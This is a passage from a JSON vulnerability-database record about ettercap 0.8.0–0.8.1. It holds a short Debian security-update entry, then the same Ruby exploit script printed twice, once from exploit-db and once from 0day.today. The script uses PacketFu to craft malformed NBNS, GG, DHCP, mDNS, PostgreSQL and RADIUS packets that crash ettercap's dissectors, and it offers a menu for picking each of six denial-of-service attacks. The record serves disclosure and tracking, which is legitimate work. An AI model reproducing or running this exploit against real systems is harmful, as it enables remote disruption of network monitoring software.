"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:21", "bulletinFamily": "unix", "description": "Package : ettercap\nVersion : 1:0.7.3-2.1+squeeze2\nCVE ID : CVE-2014-9380 CVE-2014-9381\nDebian Bug : 773416\n\nPatches a bunch of security vulnerabilities:\n - CVE-2014-9380 (Buffer over-read)\n - CVE-2014-9381 (Signedness error)\n See: https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n Patches taken from upstream\n - 6b196e011fa456499ed4650a360961a2f1323818 pull/608\n - 31b937298c8067e6b0c3217c95edceb983dfc4a2 pull/609\n Thanks to Nick Sampanis <n.sampanis@obrela.com> who is responsible for\n both finding and repairing these issues.\n\n", "modified": "2014-12-29T21:30:26", "published": "2014-12-29T21:30:26", "id": "DEBIAN:DLA-126-1:8C386", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201412/msg00028.html", "title": "[SECURITY] [DLA 126-1] ettercap security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T01:34:56", "bulletinFamily": "exploit", "description": "Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities. CVE-2014-6395. Dos exploit for linux platform", "modified": "2014-12-19T00:00:00", "published": "2014-12-19T00:00:00", "id": "EDB-ID:35580", "href": "https://www.exploit-db.com/exploits/35580/", "type": "exploitdb", "title": "Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities", "sourceData": "#Exploit Title: 6 Remote ettercap Dos exploits to 1\r\n#Date: 19/12/2014\r\n#Exploit Author: Nick Sampanis\r\n#Vendor Homepage: http://ettercap.github.io\r\n#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz\r\n#Version: 8.0-8.1\r\n#Tested on: Linux\r\n#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379\r\n#Make sure that you have installed packefu and pcaprub\r\n\r\nrequire 'packetfu'\r\ninclude PacketFu\r\n\r\nif ARGV.count < 4\r\n puts \"[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface\"\r\n puts \"[-]Use valid mac for your interface, if you dont know\"+\r\n \" victim's ip address use broadcast\"\r\n exit\r\nend\r\n\r\ndef nbns_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 137\r\n u.payload = \"\\xa0\\x2c\\x01\\x10\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n u.payload << \"\\x20\\x46\\x48\\x45\\x50\\x46\\x43\\x45\\x4c\\x45\\x48\\x46\"#name\r\n u.payload << \"\\x43\\x45\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\"#name\r\n u.payload << \"\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\"#name\r\n u.payload << \"\\x00\\x20\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.payload << \"A\"*1000 #pad\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef gg_client\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 8074\r\n u.payload = \"\\x15\\x00\\x00\\x00\" #gg_type\r\n u.payload << \"\\xe8\\x03\\x00\\x00\" #gg_len\r\n u.payload << \"A\"*1000\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef dhcp_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[0]\r\n u.ip_saddr = ARGV[1]\r\n u.udp_src = 67\r\n u.udp_dst = 4444\r\n u.payload = \"\\x02\"*236\r\n u.payload << \"\\x63\\x82\\x53\\x63\"\r\n u.payload << \"\\x35\"\r\n u.payload << \"\\x00\\x05\\x00\"\r\n u.payload << \"\\x51\"\r\n u.payload << \"\\x00\" #size\r\n u.payload << \"A\" * 3 #pad\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n\r\ndef mdns_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 5353\r\n u.payload = \"\\x11\\x11\" #id\r\n u.payload << \"\\x00\\x00\" #flags\r\n u.payload << \"\\x00\\x01\" #questions\r\n u.payload << \"\\x00\\x00\" #answer_rr\r\n u.payload << \"\\x00\\x00\" #auth_rrs\r\n u.payload << \"\\x00\\x00\" #additional_rr\r\n u.payload << \"\\x06router\\x05local\\x00\" #name\r\n u.payload << \"\\x00\\x01\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef mdns_dos_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 5353\r\n u.payload = \"\\x11\\x11\" #id\r\n u.payload << \"\\x00\\x00\" #flags\r\n u.payload << \"\\x00\\x01\" #questions\r\n u.payload << \"\\x00\\x00\" #answer_rr\r\n u.payload << \"\\x00\\x00\" #auth_rrs\r\n u.payload << \"\\x00\\x00\" #additional_rr\r\n u.payload << \"\\x01\"\r\n u.payload << \"\\x00\\x01\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.payload << \"A\"*500\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n\r\ndef pgsql_server\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[1]\r\n u.ip_daddr = ARGV[0]\r\n u.tcp_src = 5432\r\n u.tcp_dst = 3333\r\n u.payload = \"\\x52\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef pgsql_client\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 5432\r\n u.payload = \"\\x70\\x00\\x00\\x5b\\x00\\x03\\x00\\x00\\x75\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\" \r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n\r\ndef pgsql_client_shell\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 5432\r\n u.payload = \"\\x70\"\r\n u.payload << \"\\x00\\x00\\x03\\xe9\" #len\r\n u.payload << \"A\"*1000\r\n u.payload << \"\\x00\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n\r\ndef radius_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 1645\r\n u.payload = \"\\x01\\x01\\x00\\xff\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x46\\x48\\x00\\x50\\x46\\x43\\xff\\x01\\x00\\x48\\x46\\x01\\x00\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\\x00\\x20\\x00\\x01\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n\r\nputs \"[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis\"\r\nputs \"[+]-1- nbns plugin CVE-2014-9377\"\r\nputs \"[+]-2- gg dissector CVE-2014-9376\"\r\nputs \"[+]-3- dhcp dissector CVE-2014-9376\"\r\nputs \"[+]-4- mdns plugin CVE-2014-9378\"\r\nputs \"[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)\"\r\nputs \"[+]-6- radius dissector CVE-2014-9379\"\r\nprint \"choice:\"\r\nchoice = $stdin.gets.chomp().to_i()\r\n\r\ncase choice\r\nwhen 1\r\n puts \"[+]Sending nbns packet..\"\r\n nbns_header\r\nwhen 2\r\n puts \"[+]Sending client gg packet..\"\r\n gg_client\r\nwhen 3\r\n puts \"[+]Sending dhcp packet..\"\r\n dhcp_header\r\nwhen 4\r\n puts \"[+]Sending mdns packet..\"\r\n mdns_header\r\n mdns_dos_header\r\nwhen 5\r\n puts \"[+]Sending pgsql packet..\"\r\n pgsql_client\r\n pgsql_server\r\n pgsql_client_shell\r\nwhen 6\r\n puts \"[+]Sending radius packet..\"\r\n radius_header\r\nelse\r\n puts \"[-]Unrecognized command \"\r\nend\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35580/"}], "zdt": [{"lastseen": "2018-01-03T17:16:37", "bulletinFamily": "exploit", "description": "Ettercap versions 0.8.0 and 0.8.1 suffers from multiple denial of service vulnerabilities.", "modified": "2014-12-21T00:00:00", "published": "2014-12-21T00:00:00", "id": "1337DAY-ID-23028", "href": "https://0day.today/exploit/description/23028", "type": "zdt", "title": "Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit", "sourceData": "#Exploit Title: 6 Remote ettercap Dos exploits to 1\r\n#Date: 19/12/2014\r\n#Exploit Author: Nick Sampanis\r\n#Vendor Homepage: http://ettercap.github.io\r\n#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz\r\n#Version: 8.0-8.1\r\n#Tested on: Linux\r\n#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379\r\n#Make sure that you have installed packefu and pcaprub\r\n \r\nrequire 'packetfu'\r\ninclude PacketFu\r\n \r\nif ARGV.count < 4\r\n puts \"[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface\"\r\n puts \"[-]Use valid mac for your interface, if you dont know\"+\r\n \" victim's ip address use broadcast\"\r\n exit\r\nend\r\n \r\ndef nbns_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 137\r\n u.payload = \"\\xa0\\x2c\\x01\\x10\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n u.payload << \"\\x20\\x46\\x48\\x45\\x50\\x46\\x43\\x45\\x4c\\x45\\x48\\x46\"#name\r\n u.payload << \"\\x43\\x45\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\"#name\r\n u.payload << \"\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\"#name\r\n u.payload << \"\\x00\\x20\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.payload << \"A\"*1000 #pad\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef gg_client\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 8074\r\n u.payload = \"\\x15\\x00\\x00\\x00\" #gg_type\r\n u.payload << \"\\xe8\\x03\\x00\\x00\" #gg_len\r\n u.payload << \"A\"*1000\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef dhcp_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[0]\r\n u.ip_saddr = ARGV[1]\r\n u.udp_src = 67\r\n u.udp_dst = 4444\r\n u.payload = \"\\x02\"*236\r\n u.payload << \"\\x63\\x82\\x53\\x63\"\r\n u.payload << \"\\x35\"\r\n u.payload << \"\\x00\\x05\\x00\"\r\n u.payload << \"\\x51\"\r\n u.payload << \"\\x00\" #size\r\n u.payload << \"A\" * 3 #pad\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n \r\ndef mdns_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 5353\r\n u.payload = \"\\x11\\x11\" #id\r\n u.payload << \"\\x00\\x00\" #flags\r\n u.payload << \"\\x00\\x01\" #questions\r\n u.payload << \"\\x00\\x00\" #answer_rr\r\n u.payload << \"\\x00\\x00\" #auth_rrs\r\n u.payload << \"\\x00\\x00\" #additional_rr\r\n u.payload << \"\\x06router\\x05local\\x00\" #name\r\n u.payload << \"\\x00\\x01\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef mdns_dos_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 5353\r\n u.payload = \"\\x11\\x11\" #id\r\n u.payload << \"\\x00\\x00\" #flags\r\n u.payload << \"\\x00\\x01\" #questions\r\n u.payload << \"\\x00\\x00\" #answer_rr\r\n u.payload << \"\\x00\\x00\" #auth_rrs\r\n u.payload << \"\\x00\\x00\" #additional_rr\r\n u.payload << \"\\x01\"\r\n u.payload << \"\\x00\\x01\" #type\r\n u.payload << \"\\x00\\x01\" #class\r\n u.payload << \"A\"*500\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n \r\ndef pgsql_server\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[1]\r\n u.ip_daddr = ARGV[0]\r\n u.tcp_src = 5432\r\n u.tcp_dst = 3333\r\n u.payload = \"\\x52\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\ndef pgsql_client\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 5432\r\n u.payload = \"\\x70\\x00\\x00\\x5b\\x00\\x03\\x00\\x00\\x75\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n \r\ndef pgsql_client_shell\r\n u = TCPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_saddr = ARGV[0]\r\n u.ip_daddr = ARGV[1]\r\n u.tcp_src = 3333\r\n u.tcp_dst = 5432\r\n u.payload = \"\\x70\"\r\n u.payload << \"\\x00\\x00\\x03\\xe9\" #len\r\n u.payload << \"A\"*1000\r\n u.payload << \"\\x00\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n \r\ndef radius_header\r\n u = UDPPacket.new()\r\n u.eth_saddr = ARGV[2]\r\n u.eth_daddr = \"ff:ff:ff:ff:ff:ff\"\r\n u.ip_daddr = ARGV[1]\r\n u.ip_saddr = ARGV[0]\r\n u.udp_src = 4444\r\n u.udp_dst = 1645\r\n u.payload = \"\\x01\\x01\\x00\\xff\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x46\\x48\\x00\\x50\\x46\\x43\\xff\\x01\\x00\\x48\\x46\\x01\\x00\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\\x00\\x20\\x00\\x01\"\r\n u.recalc\r\n u.to_w(ARGV[3])\r\nend\r\n \r\nputs \"[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis\"\r\nputs \"[+]-1- nbns plugin CVE-2014-9377\"\r\nputs \"[+]-2- gg dissector CVE-2014-9376\"\r\nputs \"[+]-3- dhcp dissector CVE-2014-9376\"\r\nputs \"[+]-4- mdns plugin CVE-2014-9378\"\r\nputs \"[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)\"\r\nputs \"[+]-6- radius dissector CVE-2014-9379\"\r\nprint \"choice:\"\r\nchoice = $stdin.gets.chomp().to_i()\r\n \r\ncase choice\r\nwhen 1\r\n puts \"[+]Sending nbns packet..\"\r\n nbns_header\r\nwhen 2\r\n puts \"[+]Sending client gg packet..\"\r\n gg_client\r\nwhen 3\r\n puts \"[+]Sending dhcp packet..\"\r\n dhcp_header\r\nwhen 4\r\n puts \"[+]Sending mdns packet..\"\r\n mdns_header\r\n mdns_dos_header\r\nwhen 5\r\n puts \"[+]Sending pgsql packet..\"\r\n pgsql_client\r\n pgsql_server\r\n pgsql_client_shell\r\nwhen 6\r\n puts \"[+]Sending radius packet..\"\r\n radius_header\r\nelse\r\n puts \"[-]Unrecognized command \"\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23028"}]}